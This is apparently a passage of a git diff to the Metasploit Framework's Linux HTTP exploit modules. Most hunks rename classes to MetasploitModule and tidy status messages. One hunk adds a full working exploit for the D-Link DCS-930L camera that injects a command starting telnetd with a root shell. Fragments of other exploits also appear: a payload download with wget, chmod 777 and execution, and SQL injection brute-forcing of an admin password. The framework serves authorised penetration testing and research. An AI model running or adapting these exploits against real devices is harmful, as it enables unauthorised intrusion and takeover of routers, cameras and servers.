uploaded/ - print_good("#{peer} - Stager uploaded successfully") + print_good("Stager uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload stager") end @@ -140,7 +140,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.code && res.code == 401 fail_with(Failure::NoAccess, "#{peer} - Authentication failed") elsif res.code && res.code == 200 && res.body - print_good("#{peer} - Payload executed successfully") + print_good("Payload executed successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Payload execution failed") end @@ -169,9 +169,9 @@ rm -f /tmp/tmpchpw EOF res = upload('/sbin/chpasswd.sh', chpasswd) if res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ - vprint_good("#{peer} - Restored /sbin/chpasswd.sh successfully") + vprint_good("Restored /sbin/chpasswd.sh successfully") else - vprint_warning("#{peer} - Could not restore /sbin/chpasswd.sh to default") + vprint_warning("Could not restore /sbin/chpasswd.sh to default") end end @@ -179,7 +179,7 @@ EOF # Upload a file to a specified path # def upload(path, data) - vprint_status("#{peer} - Writing #{data.length} bytes to #{path}") + vprint_status("Writing #{data.length} bytes to #{path}") boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}" post_data = "--#{boundary}\r\n" diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb new file mode 100644 index 0000000000..204c28565a --- /dev/null +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb @@ -0,0 +1,158 @@ +## +## This module requires Metasploit: http://metasploit.com/download +## Current source: https://github.com/rapid7/metasploit-framework +### + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + + include Msf::Exploit::Remote::Telnet + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link DCS-930L Authenticated Remote Command Execution', + 'Description' => %q{ + The D-Link DCS-930L Network Video Camera is vulnerable + to OS Command Injection via the web interface. The vulnerability + exists at /setSystemCommand, which is accessible with credentials. + This vulnerability was present in firmware version 2.01 and fixed + by 2.12. + }, + 'Author' => + [ + 'Nicholas Starke ' + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => 'Dec 20 2015', + 'Privileged' => true, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('USERNAME', [ true, 'User to login with', 'admin']), + OptString.new('PASSWORD', [ false, 'Password to login with', '']) + ], self.class) + + register_advanced_options( + [ + OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet Command', 10]), + OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]) + ], self.class) + end + + def telnet_timeout + (datastore['TelnetTimeout'] || 10) + end + + def banner_timeout + (datastore['TelnetBannerTimeout'] || 25) + end + + def exploit + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] || '' + + test_login(user, pass) + exploit_telnet + end + + def test_login(user, pass) + print_status("#{peer} - Trying to login with #{user} : #{pass}") + + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'authorization' => basic_auth(user, pass) + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}") if res.code != 200 + + print_good("#{peer} - Successful login #{user} : #{pass}") + end + + def exploit_telnet + telnet_port = rand(32767) + 32768 + + print_status("#{peer} - Telnet Port: #{telnet_port}") + + cmd = "telnetd -p #{telnet_port} -l/bin/sh" + + telnet_request(cmd) + + print_status("#{rhost}:#{telnet_port} - Trying to establish telnet connection...") + ctx = { 'Msf' => framework, 'MsfExploit' => self } + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => telnet_timeout }) + + if sock.nil? + fail_with(Failure::Unreachable, "#{rhost}:#{telnet_port} - Backdoor service unreachable") + end + + add_socket(sock) + + print_status("#{rhost}:#{telnet_port} - Trying to establish a telnet session...") + prompt = negotiate_telnet(sock) + + if prompt.nil? + sock.close + fail_with(Failure::Unknown, "#{rhost}:#{telnet_port} - Unable to establish a telnet session") + else + print_good("#{rhost}:#{telnet_port} - Telnet session successfully established") + end + + handler(sock) + end + + def telnet_request(cmd) + uri = '/setSystemCommand' + + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'POST', + 'vars_post' => { + 'ReplySuccessPage' => 'docmd.htm', + 'ReplyErrorPage' => 'docmd.htm', + 'SystemCommand' => cmd, + 'ConfigSystemCommand' => 'Save' + } + }) + return res + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end + + def negotiate_telnet(sock) + begin + Timeout.timeout(banner_timeout) do + while(true) + data = sock.get_once(-1, telnet_timeout) + return nil if not data or data.length == 0 + if data =~ /BusyBox/ + return true + end + end + end + rescue ::Timeout::Error + return nil + end + end +end diff --git a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb index d9a1f0ef17..7f4eedea14 100644 --- a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb index 4470db0325..603be9dcc2 100644 --- a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb +++ b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb index 14d871d2b0..836f6091b3 100644 --- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb +++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Because only has been tested on a QEMU emulated environment HttpFingerprint = { :pattern => [ /Boa/ ] } @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote shellcode << rand_text(0x1c) # filler shellcode << payload.encoded # shellcode - print_status("#{peer} - Sending exploit...") + print_status("Sending exploit...") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/linux/http/dlink_dir615_up_exec.rb b/modules/exploits/linux/http/dlink_dir615_up_exec.rb index c2b8c13e31..e0edc210c1 100644 --- a/modules/exploits/linux/http/dlink_dir615_up_exec.rb +++ b/modules/exploits/linux/http/dlink_dir615_up_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb index 66ea232ee9..a6957b0115 100644 --- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb +++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -73,20 +73,20 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Uploading stager ...") + print_status("Uploading stager ...") @counter = 1 execute_cmdstager( :flavor => :echo, :linemax => 95 # limited by our upload, larger payloads crash the web server ) - print_status("#{peer} - creating payload and executing it ...") + print_status("creating payload and executing it ...") (1 .. @counter).each do |act_file| # the http server blocks access to our files ... we copy it to a new one diff --git a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb index 2fe19360ba..9327460abf 100644 --- a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") @my_target = target check_code = check @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end - print_status("#{peer} - Exploiting #{@my_target.name}...") + print_status("Exploiting #{@my_target.name}...") execute_cmdstager( :flavor => :echo, :linemax => 185 diff --git a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb index e455b14a64..f58e7ef41c 100644 --- a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -73,13 +73,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, diff --git a/modules/exploits/linux/http/dlink_hnap_bof.rb b/modules/exploits/linux/http/dlink_hnap_bof.rb index 62f500e8eb..1e152c7bb3 100644 --- a/modules/exploits/linux/http/dlink_hnap_bof.rb +++ b/modules/exploits/linux/http/dlink_hnap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") @my_target = target check_code = check @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end - print_status("#{peer} - Exploiting #{@my_target.name}...") + print_status("Exploiting #{@my_target.name}...") execute_cmdstager( :flavor => :echo, :linemax => 185 diff --git a/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb index 0f001df572..c6e14ef89a 100644 --- a/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -80,13 +80,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, diff --git a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb index fc89dd0e39..396e03d2d5 100644 --- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -80,13 +80,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb index 1513892d77..599c0ae82c 100644 --- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb +++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -117,26 +117,26 @@ class Metasploit3 < Msf::Exploit::Remote @uri.path << "/" if @uri.path[-1, 1] != "/" peer = "#{rhost}:#{rport}" - print_status("#{peer} - Getting the sid and token...") + print_status("Getting the sid and token...") sid, token = get_sid_token if sid.nil? - print_error("#{peer} - Unable to retrieve a session ID") + print_error("Unable to retrieve a session ID") return elsif token.nil? - print_error("#{peer} - Unable to retrieve a token") + print_error("Unable to retrieve a token") return end user = datastore['USERNAME'] pass = datastore['PASSWORD'] - print_status("#{peer} - Attempt to login with \"#{user}:#{pass}\"") + print_status("Attempt to login with \"#{user}:#{pass}\"") success = login(sid, token) if not success - print_error("#{peer} - Unable to login") + print_error("Unable to login") return end - print_status("#{peer} - Sending malicious request...") + print_status("Sending malicious request...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(@uri.path, "admin/tools/export.php"), diff --git a/modules/exploits/linux/http/dreambox_openpli_shell.rb b/modules/exploits/linux/http/dreambox_openpli_shell.rb index b788d79503..0f79eb3ee7 100644 --- a/modules/exploits/linux/http/dreambox_openpli_shell.rb +++ b/modules/exploits/linux/http/dreambox_openpli_shell.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/efw_chpasswd_exec.rb b/modules/exploits/linux/http/efw_chpasswd_exec.rb index dc3a532f2f..870881ba4d 100644 --- a/modules/exploits/linux/http/efw_chpasswd_exec.rb +++ b/modules/exploits/linux/http/efw_chpasswd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager diff --git a/modules/exploits/linux/http/esva_exec.rb b/modules/exploits/linux/http/esva_exec.rb index de1a4d8942..3e812db793 100644 --- a/modules/exploits/linux/http/esva_exec.rb +++ b/modules/exploits/linux/http/esva_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit peer = "#{rhost}:#{rport}" - print_status("#{peer} - Sending Command injection") + print_status("Sending Command injection") res = send_request_cgi({ 'method' => 'GET', 'uri' => "/cgi-bin/learn-msg.cgi", @@ -84,12 +84,12 @@ class Metasploit3 < Msf::Exploit::Remote # If the server doesn't return the default redirection, probably something is wrong if not res or res.code != 200 or res.body !~ /meta http-equiv="refresh" content="0;URL=\/learned.html"/ - print_error("#{peer} - Probably command not executed, aborting!") + print_error("Probably command not executed, aborting!") return end - print_good("#{peer} - Command executed successfully") - print_status("#{peer} - Output: \n#{res.body.split("Learned tokens")[0]}") + print_good("Command executed successfully") + print_status("Output: \n#{res.body.split("Learned tokens")[0]}") end end diff --git a/modules/exploits/linux/http/f5_icall_cmd.rb b/modules/exploits/linux/http/f5_icall_cmd.rb index dbb7f728db..a7fa0234a7 100644 --- a/modules/exploits/linux/http/f5_icall_cmd.rb +++ b/modules/exploits/linux/http/f5_icall_cmd.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/linux/http/f5_icontrol_exec.rb b/modules/exploits/linux/http/f5_icontrol_exec.rb index a62532c29a..05a1ad2591 100644 --- a/modules/exploits/linux/http/f5_icontrol_exec.rb +++ b/modules/exploits/linux/http/f5_icontrol_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb index dff154782b..554c48b12f 100644 --- a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb +++ b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/fritzbox_echo_exec.rb b/modules/exploits/linux/http/fritzbox_echo_exec.rb index acb764be06..8f634e376a 100644 --- a/modules/exploits/linux/http/fritzbox_echo_exec.rb +++ b/modules/exploits/linux/http/fritzbox_echo_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -101,13 +101,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( flavor: :echo, linemax: 92 diff --git a/modules/exploits/linux/http/gitlist_exec.rb b/modules/exploits/linux/http/gitlist_exec.rb index 2c4caca16b..64a57f904f 100644 --- a/modules/exploits/linux/http/gitlist_exec.rb +++ b/modules/exploits/linux/http/gitlist_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/gpsd_format_string.rb b/modules/exploits/linux/http/gpsd_format_string.rb index 1a1b961b1c..c29ee861d9 100644 --- a/modules/exploits/linux/http/gpsd_format_string.rb +++ b/modules/exploits/linux/http/gpsd_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb index a7ca3d7d9b..112999f051 100644 --- a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb +++ b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] } @@ -115,14 +115,14 @@ class Metasploit3 < Msf::Exploit::Remote def exploit peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + print_status("Attempting to login...") @josso_id = get_josso_token if @josso_id.nil? fail_with(Failure::NoAccess, "#{peer} - Unable to retrieve a JOSSO session ID") end - print_good("#{peer} - Authentication successful") + print_good("Authentication successful") - print_status("#{peer} - Sending malicious request...") + print_status("Sending malicious request...") execute_command(payload.encoded) end end diff --git a/modules/exploits/linux/http/hp_system_management.rb b/modules/exploits/linux/http/hp_system_management.rb index 5ebaca92ab..b478063baa 100644 --- a/modules/exploits/linux/http/hp_system_management.rb +++ b/modules/exploits/linux/http/hp_system_management.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking HttpFingerprint = { :pattern => [ /HP System Management Homepage/ ] } diff --git a/modules/exploits/linux/http/kloxo_sqli.rb b/modules/exploits/linux/http/kloxo_sqli.rb index e3c2a9b4a8..b041765530 100644 --- a/modules/exploits/linux/http/kloxo_sqli.rb +++ b/modules/exploits/linux/http/kloxo_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper @@ -111,13 +111,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited") unless check == Exploit::CheckCode::Vulnerable - print_status("#{peer} - Recovering the admin password with SQLi...") + print_status("Recovering the admin password with SQLi...") loot = base64_password fail_with(Failure::Unknown, "#{peer} - Failed to exploit the SQLi...") if loot.nil? @password = Rex::Text.decode_base64(loot) - print_good("#{peer} - Password recovered: #{@password}") + print_good("Password recovered: #{@password}") - print_status("#{peer} - Logging into the Control Panel...") + print_status("Logging into the Control Panel...") @session = send_login fail_with(Failure::NoAccess, "#{peer} - Login with admin/#{@password} failed...") if @session.nil? @@ -130,11 +130,11 @@ class Metasploit3 < Msf::Exploit::Remote attempt_time: DateTime.now ) - print_status("#{peer} - Retrieving the server name...") + print_status("Retrieving the server name...") @server = server_info fail_with(Failure::NoAccess, "#{peer} - Login with admin/#{Rex::Text.decode_base64(base64_password)} failed...") if @server.nil? - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") send_command(payload.encoded) end @@ -252,14 +252,14 @@ class Metasploit3 < Msf::Exploit::Remote loot = '' until exploit_sqli(i, "\x00") - vprint_status("#{peer} - Bruteforcing position #{i}") + vprint_status("Bruteforcing position #{i}") c = brute_force_char(i) if c.nil? return nil else loot << c end - vprint_status("#{peer} - Found: #{loot}") + vprint_status("Found: #{loot}") i = i + 1 end @@ -297,7 +297,7 @@ class Metasploit3 < Msf::Exploit::Remote return false end - vprint_warning("#{peer} - Unknown fingerprint while exploiting SQLi... be careful") + vprint_warning("Unknown fingerprint while exploiting SQLi... be careful") false end diff --git a/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb b/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb index 35eace8ecb..05e87087a2 100644 --- a/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb +++ b/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_apply_cgi.rb b/modules/exploits/linux/http/linksys_apply_cgi.rb index e46621bd2a..a51d2dbdd6 100644 --- a/modules/exploits/linux/http/linksys_apply_cgi.rb +++ b/modules/exploits/linux/http/linksys_apply_cgi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb index c4d7219cd1..d2f717dc84 100644 --- a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_themoon_exec.rb b/modules/exploits/linux/http/linksys_themoon_exec.rb index 1831de7645..57b9e6e986 100644 --- a/modules/exploits/linux/http/linksys_themoon_exec.rb +++ b/modules/exploits/linux/http/linksys_themoon_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -109,13 +109,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager({:flavor => :echo}) end diff --git a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb index c8d41f7060..11ff4d4d9a 100644 --- a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote )) register_options([ - OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']), + OptString.new('USERNAME', [ false, 'Valid router administrator username', 'admin']), OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']), OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']), OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20]) diff --git a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb index 289ad49c36..11e0b35ccf 100644 --- a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/tftp' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb index 34f3ec1421..fb0d1ca187 100644 --- a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/multi_ncc_ping_exec.rb b/modules/exploits/linux/http/multi_ncc_ping_exec.rb index 67a93ba046..2006f04b3d 100644 --- a/modules/exploits/linux/http/multi_ncc_ping_exec.rb +++ b/modules/exploits/linux/http/multi_ncc_ping_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # Only tested on Emulated environment include Msf::Exploit::Remote::HttpClient @@ -111,13 +111,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") @pl = generate_payload_exe @payload_url = '' @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{upload_path}" - print_status("#{peer} - Downloading the payload to the target machine...") + print_status("Downloading the payload to the target machine...") res = exec_command(cmd) if res && [200].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/ @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote def chmod_payload cmd = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}" - print_status("#{peer} - chmod the payload...") + print_status("chmod the payload...") res = exec_command(cmd, 1) unless res @@ -169,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote def exec_payload cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf) - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") res = exec_command(cmd, 1) unless res diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb 